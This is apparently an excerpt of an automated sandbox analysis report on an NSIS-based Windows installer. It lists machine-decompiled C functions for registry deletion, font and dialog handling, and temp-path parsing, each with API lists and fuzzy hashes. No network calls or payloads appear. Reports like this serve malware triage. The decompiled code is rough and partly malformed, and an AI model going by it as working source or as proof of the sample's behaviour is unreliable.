                                                						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                							_t48 = E72AB2F10(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E72AB2F40(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E72AB2D80(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E72AB2E30(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                					if( *((char*)(_t81 + 1)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E72AB2D40(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 462cd7358b12584f09ffb976aa63f906938269c38cbee1ce7c95e1b1f09e3da3
                                                • Instruction ID: 2f1e287935417d8a184e13ee9f973b1ff6ab5c1fb1fcb1e7cde7e57428772477
                                                • Opcode Fuzzy Hash: 462cd7358b12584f09ffb976aa63f906938269c38cbee1ce7c95e1b1f09e3da3
                                                • Instruction Fuzzy Hash: 6751C672D441D4AEDB129FACC58866DBFBFAF4E345F14206ED406A311CC63DAA42C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				char _v276;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E00405F5A(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v276);
                                                						_push(0);
                                                						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v276);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E004064DD(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyA(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}













                                                APIs
                                                • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                • Instruction ID: 148915660003aa48eae5eddbcc28bbe782376451a520f9e519856868b1d6a9df
                                                • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                • Instruction Fuzzy Hash: 8D215771900109BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D65(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				CHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t58;
                                                				long _t61;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                				} else {
                                                					E00402BAC(2);
                                                					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x1c);
                                                				 *(_t65 + 8) = _t30;
                                                				_t58 = _t55 & 0x00000004;
                                                				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402BCE(0x11);
                                                				}
                                                				 *(_t65 - 8) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                				asm("sbb edi, edi");
                                                				_t61 = LoadImageA( ~_t58 &  *0x7a2f60,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                					_push(_t61);
                                                					E00406032();
                                                				}
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}












                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 40392f1eb7072ab94e38a578d4c48b342906e8e096f6e8c8612fbb26fff2dacf
                                                • Instruction ID: ebfb82876bdf2138dcddadba10df032a250d68975ffa4ffa2b6a0506bdc7ea5a
                                                • Opcode Fuzzy Hash: 40392f1eb7072ab94e38a578d4c48b342906e8e096f6e8c8612fbb26fff2dacf
                                                • Instruction Fuzzy Hash: 7F212872A00109AFCB05DFA4DD85AAEBBB5FB48300F24407EF905F62A1CB389941DB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E35(intOrPtr __edx) {
                                                				void* __esi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				struct HDC__* _t31;
                                                				void* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t31 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402BAC(2);
                                                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                				0x40b808->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t31);
                                                				 *0x40b818 = E00402BAC(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                				 *0x40b81f = 1;
                                                				 *0x40b81c = _t15 & 0x00000001;
                                                				 *0x40b81d = _t15 & 0x00000002;
                                                				 *0x40b81e = _t15 & 0x00000004;
                                                				E00406167(_t9, _t31, _t33, 0x40b824,  *((intOrPtr*)(_t35 - 0x24)));
                                                				_t18 = CreateFontIndirectA(0x40b808);
                                                				_push(_t18);
                                                				_push(_t33);
                                                				E00406032();
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                • GetDC.USER32(?), ref: 00401E38
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                • ReleaseDC.USER32 ref: 00401E6B
                                                • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
                                                • Instruction ID: 57ae00d383071d6c5df03c611de82deed4414851ba4a5b5ac7ac255a7617b9b1
                                                • Opcode Fuzzy Hash: dbc41a527304c6fe7c4bbb0ed52bde6d70f826071420a725491f8bf133d98c2a
                                                • Instruction Fuzzy Hash: 0E019672500240AFD7006BB0AE4A79A3FF8D755301F108839F241B62F2C67804458BAC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C2E(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				CHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t61;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402BAC(3);
                                                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                				 *(_t64 - 8) = _t29;
                                                				_t30 = E00402BAC(4);
                                                				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402BCE(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t59 = E00402BCE();
                                                					_t32 = E00402BCE();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t59;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t61 = E00402BAC();
                                                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                					_t41 = E00402BAC(2);
                                                					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                					_t56 =  *(_t64 - 0x14) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0xc) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                					_push( *(_t64 - 0xc));
                                                					E00406032();
                                                				}
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}
















                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                • SendMessageA.USER32 ref: 00401CB6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: f0dd942a178f56fd373b290941ab0376cb77fac67056b85627442068a5db435e
                                                • Instruction ID: 5277f65d77addf964e4e112e3ca2bdcdb488fad455084b9b29b5161e7124752c
                                                • Opcode Fuzzy Hash: f0dd942a178f56fd373b290941ab0376cb77fac67056b85627442068a5db435e
                                                • Instruction Fuzzy Hash: 4C216071944208BEEB059FB5D98AAAE7FB5EF44304F20847FF502B61D1D6B88540DB28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E004049A1(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v36;
                                                				char _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				signed int _t22;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				void* _t41;
                                                				signed int _t43;
                                                				signed int _t47;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				signed int _t53;
                                                
                                                				_t21 = _a16;
                                                				_t51 = _a12;
                                                				_t41 = 0xffffffdc;
                                                				if(_t21 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t22 = _t51;
                                                					if(_t51 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t41 = 0xffffffdd;
                                                					}
                                                					if(_t51 < 0x400) {
                                                						_t41 = 0xffffffde;
                                                					}
                                                					if(_t51 < 0xffff3333) {
                                                						_t50 = 0x14;
                                                						asm("cdq");
                                                						_t22 = 1 / _t50 + _t51;
                                                					}
                                                					_t23 = _t22 & 0x00ffffff;
                                                					_t53 = _t22 >> 0;
                                                					_t43 = 0xa;
                                                					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                				} else {
                                                					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                					_t47 = 0;
                                                				}
                                                				_t29 = E00406167(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                				_t31 = E00406167(_t41, _t47, _t53,  &_v68, _t41);
                                                				_t32 = E00406167(_t41, _t47, 0x79f568, 0x79f568, _a8);
                                                				wsprintfA(_t32 + lstrlenA(0x79f568), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                				return SetDlgItemTextA( *0x7a2738, _a4, 0x79f568);
                                                			}



















                                                APIs
                                                • lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                • wsprintfA.USER32 ref: 00404A47
                                                • SetDlgItemTextA.USER32 ref: 00404A5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 575aa24b2d098a28b27e847770fdd4be0d13f9e94d9c42d0da02910fc49695c5
                                                • Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
                                                • Opcode Fuzzy Hash: 575aa24b2d098a28b27e847770fdd4be0d13f9e94d9c42d0da02910fc49695c5
                                                • Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405B5A(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				void* _t22;
                                                
                                                				E004060D4(0x7a0970, _a4);
                                                				_t21 = E00405B05(0x7a0970);
                                                				if(_t21 != 0) {
                                                					E004063AF(_t21);
                                                					if(( *0x7a2f7c & 0x00000080) == 0) {
                                                						L5:
                                                						_t22 = _t21 - 0x7a0970;
                                                						while(1) {
                                                							_t11 = lstrlenA(0x7a0970);
                                                							_push(0x7a0970);
                                                							if(_t11 <= _t22) {
                                                								break;
                                                							}
                                                							_t12 = E00406448();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405AB3(0x7a0970);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405A6C();
                                                						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                APIs
                                                  • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                  • Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
                                                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb112C.tmp
                                                • API String ID: 3248276644-43596561
                                                • Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                • Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
                                                • Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
                                                • Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405A6C(CHAR* _a4) {
                                                				CHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                					lstrcatA(_t7, 0x40a014);
                                                				}
                                                				return _t7;
                                                			}




                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
                                                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                • Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
                                                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                • Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405B05(CHAR* _a4) {
                                                				CHAR* _t5;
                                                				char* _t7;
                                                				CHAR* _t9;
                                                				char _t10;
                                                				CHAR* _t11;
                                                				void* _t13;
                                                
                                                				_t11 = _a4;
                                                				_t9 = CharNextA(_t11);
                                                				_t5 = CharNextA(_t9);
                                                				_t10 =  *_t11;
                                                				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                                					if(_t10 != 0x5c || _t11[1] != _t10) {
                                                						L10:
                                                						return 0;
                                                					} else {
                                                						_t13 = 2;
                                                						while(1) {
                                                							_t13 = _t13 - 1;
                                                							_t7 = E00405A97(_t5, 0x5c);
                                                							if( *_t7 == 0) {
                                                								goto L10;
                                                							}
                                                							_t5 = _t7 + 1;
                                                							if(_t13 != 0) {
                                                								continue;
                                                							}
                                                							return _t5;
                                                						}
                                                						goto L10;
                                                					}
                                                				} else {
                                                					return CharNextA(_t5);
                                                				}
                                                			}









                                                APIs
                                                • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                • CharNextA.USER32(00000000), ref: 00405B18
                                                • CharNextA.USER32(00000000), ref: 00405B2C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsb112C.tmp, xrefs: 00405B06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb112C.tmp
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402E3D(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					if( *0x79e120 == 0) {
                                                						_t2 = GetTickCount();
                                                						if(_t2 >  *0x7a2f70) {
                                                							_t3 = CreateDialogParamA( *0x7a2f60, 0x6f, 0, E00402DBA, 0);
                                                							 *0x79e120 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406519(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x79e120;
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x79e120 = 0;
                                                					return _t6;
                                                				}
                                                			}







                                                APIs
                                                • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                • GetTickCount.KERNEL32 ref: 00402E6E
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E0040516F(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x79f554 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x79f554 = _t16;
                                                							E00404B2B();
                                                						}
                                                						L11:
                                                						return CallWindowProcA( *0x79f55c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404AAB(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004041A4(0x413);
                                                				return 0;
                                                			}






                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040519E
                                                • CallWindowProcA.USER32 ref: 004051EF
                                                  • Part of subcall function 004041A4: SendMessageA.USER32 ref: 004041B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
